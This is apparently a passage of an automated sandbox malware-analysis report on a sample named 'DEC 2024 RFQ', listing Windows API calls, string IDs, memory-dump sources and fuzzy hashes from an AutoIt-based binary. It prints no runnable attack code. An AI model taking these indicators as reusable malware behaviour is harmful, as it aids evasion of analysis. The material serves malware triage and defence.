• OpenProcessToken.ADVAPI32(00000000,?,?,?,000782E6), ref: 00078736
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: 2b46195a8041ede3d1ad31a2ce1c55121edd0dde5468b8f8af2f2618238a0e55
• Instruction ID: f870df506894fa166a8e0428a375b984ccb7621b7500f79cad84c9947e0347cb
• Opcode Fuzzy Hash: 2b46195a8041ede3d1ad31a2ce1c55121edd0dde5468b8f8af2f2618238a0e55
• Instruction Fuzzy Hash: 6BE08636A552129BE7605FF05D0CFA73BACEF52791F14C828B24AC9040DA3C8441C750
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 0007B4BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container
• API String ID: 3565006973-3941886329
• Opcode ID: 1bef01b892cc6feb4abc413a99526e4712749a3396ea59590d0f59f435021108
• Instruction ID: 8bd4127b9f823571bb7beca32b45229a1502f69727620281f6eeb18180a86e25
• Opcode Fuzzy Hash: 1bef01b892cc6feb4abc413a99526e4712749a3396ea59590d0f59f435021108
• Instruction Fuzzy Hash: 8B914970A00601AFDB64DF64C884BAAB7F5FF48710F10856EF94ACB291DB75E841CB64
APIs
  • Part of subcall function 0003FC86: _wcscpy.LIBCMT ref: 0003FCA9
  • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
  • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
• __wcsnicmp.LIBCMT ref: 0008B02D
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0008B0F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
• Opcode ID: 5813a28f762b239ec5bc5ce6f9886fb894e0f7928c4bd935348e3edb0ef14fa6
• Instruction ID: bea4507f588a4aef10c5e259b143f522289297310f939ecceefd1f33917a6673
• Opcode Fuzzy Hash: 5813a28f762b239ec5bc5ce6f9886fb894e0f7928c4bd935348e3edb0ef14fa6
• Instruction Fuzzy Hash: F3618D75A00219AFCB14EF94D895EEEB7F4FB09710F1440A9F956AB291DB30AE40CB94
APIs
• Sleep.KERNEL32(00000000), ref: 00032968
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00032981
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 3d6eab26e8b1d5b5372422a2fa4b8c515068d279e234ceeba1d2c2dc28ca2561
• Instruction ID: ec11d775373221a20abcf9b359de1a7c285ff9ff75848d3b8cafd065c4c11f97
• Opcode Fuzzy Hash: 3d6eab26e8b1d5b5372422a2fa4b8c515068d279e234ceeba1d2c2dc28ca2561
• Instruction Fuzzy Hash: EF5147714087549BE720EF10E886BEFBBE8FB85354F42885DF6D8410A2DF318529CB66
APIs
  • Part of subcall function 00024F0B: __fread_nolock.LIBCMT ref: 00024F29
• _wcscmp.LIBCMT ref: 00089824
• _wcscmp.LIBCMT ref: 00089837
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: d17063aba7d2e6963332cf7a7e547ca07659e9d1a268bffefa37eca62607e9cb
• Instruction ID: bcf6d7a52fe52b5cb149b71daa59caeddc1234b8ea0d48ea6fe004c0ba33ec25
• Opcode Fuzzy Hash: d17063aba7d2e6963332cf7a7e547ca07659e9d1a268bffefa37eca62607e9cb
• Instruction Fuzzy Hash: 3941C671A0021ABADF20AEA0DC45FEFBBFDEF85710F000479F904B7182DA719A048B65
APIs
• _memset.LIBCMT ref: 0009259E
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 000925D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
• Opcode ID: 2002e8284fa04845d63468debd1dabffa8ddb68a0a5f23d41fb4742e8d8a8c04
• Instruction ID: a4322cf32b850db49ffeed2160efab75e9538e78b0e90878db44d5f3a83c6c53
• Opcode Fuzzy Hash: 2002e8284fa04845d63468debd1dabffa8ddb68a0a5f23d41fb4742e8d8a8c04
• Instruction Fuzzy Hash: BC311571804119EBCF11EFA1DC85EEEBFB8FF08350F104069F919A6162EB315A56DBA0
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 000A7B61
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000A7B76
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 5beb3c99c49362b1bd1d78ebcdcfeb7455b0509bff828a82cb08c5144096caae
• Instruction ID: dd546d930f3a4dbd12db0c864bf2c32255b95e036043ac8aea14d6f56e72b6e2
• Opcode Fuzzy Hash: 5beb3c99c49362b1bd1d78ebcdcfeb7455b0509bff828a82cb08c5144096caae
• Instruction Fuzzy Hash: 05410A74A05209AFDB54CFA4C981BEEBBF5FF49300F10416AE908AB351D771A951CFA0
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 000A6B17
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 000A6B53
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• _memset.LIBCMT ref: 00082911
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0008294C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• __snwprintf.LIBCMT ref: 00093A66
  • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 3506404897-2584243854
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000A6761
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000A676C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
  • Part of subcall function 00021D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00021D73
  • Part of subcall function 00021D35: GetStockObject.GDI32(00000011), ref: 00021D87
  • Part of subcall function 00021D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00021D91
• GetWindowRect.USER32(00000000,?), ref: 000A6C71
• GetSysColor.USER32(00000012), ref: 000A6C8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 000A69A2
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 000A69B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
APIs
• _memset.LIBCMT ref: 00082A22
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00082A41
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0009222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00092255
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 0007AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0007AABC
                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00078E73
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: 1e276cf6bfb9afc8459ce921c5be3567fd79244260a4dcc5140944f0b3d72f58
                                                                                                                      • Instruction ID: 57ab85eef9778d2aef193edf6089a3c575dafc09db9f1d21382e1145a0a8ebcc
                                                                                                                      • Opcode Fuzzy Hash: 1e276cf6bfb9afc8459ce921c5be3567fd79244260a4dcc5140944f0b3d72f58
                                                                                                                      • Instruction Fuzzy Hash: 7D01F571B81229AB8B14EBA0CC45CFE7368AF02320B048619F8295B2D2EF355808D764
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 0007AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0007AABC
                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00078D6B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: d540a7051a6229ade94a039df22caf2146d4216bc80024e9d9c706bd8897f13a
                                                                                                                      • Instruction ID: c9e8ded35282d396495e3ac95448ac9909d5df5db62e03397fd056469bf15c6f
                                                                                                                      • Opcode Fuzzy Hash: d540a7051a6229ade94a039df22caf2146d4216bc80024e9d9c706bd8897f13a
                                                                                                                      • Instruction Fuzzy Hash: 9F01D471B81119BBDB24EBA0C956EFF77A89F16340F108019B809672D2EE295E08D376
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 0007AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0007AABC
                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00078DEE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: c036bed39b4d5d7c75ad3765f1ab2b8468e1c01d6468d749da7d40157fe42397
                                                                                                                      • Instruction ID: 9ce44b6ac286f91935f56c2fc8f61f1c6cf1b8305b4552036e42b3df88498537
                                                                                                                      • Opcode Fuzzy Hash: c036bed39b4d5d7c75ad3765f1ab2b8468e1c01d6468d749da7d40157fe42397
                                                                                                                      • Instruction Fuzzy Hash: EC01F771F81119B7DB25E6A4C946EFF77AC8F12300F108015B80A672D2DE295E08D375
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0007C534
                                                                                                                        • Part of subcall function 0007C816: _memmove.LIBCMT ref: 0007C860
                                                                                                                        • Part of subcall function 0007C816: VariantInit.OLEAUT32(00000000), ref: 0007C882
                                                                                                                        • Part of subcall function 0007C816: VariantCopy.OLEAUT32(00000000,?), ref: 0007C88C
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0007C556
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                      • String ID: d}
                                                                                                                      • API String ID: 2932060187-1421853160
                                                                                                                      • Opcode ID: 76d39d96e2123a81c660aa86c7009e1c64777cac404d14500a7df7f6ed7ad887
                                                                                                                      • Instruction ID: 9e028a785d19be6c84c49628993577ba30b059391d2bc89c478ebc48c3bfbf2c
                                                                                                                      • Opcode Fuzzy Hash: 76d39d96e2123a81c660aa86c7009e1c64777cac404d14500a7df7f6ed7ad887
                                                                                                                      • Instruction Fuzzy Hash: D5110C719007099FD710DFAAD88489AF7F8FF18310B50862FE58AD7612E775AA45CBA0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __calloc_crt
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3494438863-1747426322
                                                                                                                      • Opcode ID: 993b96f5648f7768ee854808a55f96ede8a5648eb83a8c10161f936cfa6c9469
                                                                                                                      • Instruction ID: ac7f0c5aa518a75cc21a79d46fe43d3aea543d9a95970b19218cf0a4f7300605
                                                                                                                      • Opcode Fuzzy Hash: 993b96f5648f7768ee854808a55f96ede8a5648eb83a8c10161f936cfa6c9469
                                                                                                                      • Instruction Fuzzy Hash: 12F044B1608B518BF7649F54FC91BA627D5E702B34B50483EE300DF291FB7988C186D9
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp
                                                                                                                      • String ID: #32770
                                                                                                                      • API String ID: 2292705959-463685578
                                                                                                                      • Opcode ID: 197874e52203a4bee5c7ab6a4906b45404b93c6f38a8db099a27bde4f691a004
                                                                                                                      • Instruction ID: 50657f35ed6c79b54907041c515fea924ff0bc9530afd58bd591168aadc6065a
                                                                                                                      • Opcode Fuzzy Hash: 197874e52203a4bee5c7ab6a4906b45404b93c6f38a8db099a27bde4f691a004
                                                                                                                      • Instruction Fuzzy Hash: 31E06833600B292BE320AB99AC49FB7F7ECEB61B70F00002BFD00D7041D9609A4187E0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0005B314: _memset.LIBCMT ref: 0005B321
                                                                                                                        • Part of subcall function 00040940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0005B2F0,?,?,?,0002100A), ref: 00040945
                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0002100A), ref: 0005B2F4
                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0002100A), ref: 0005B303
                                                                                                                      Strings
                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0005B2FE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
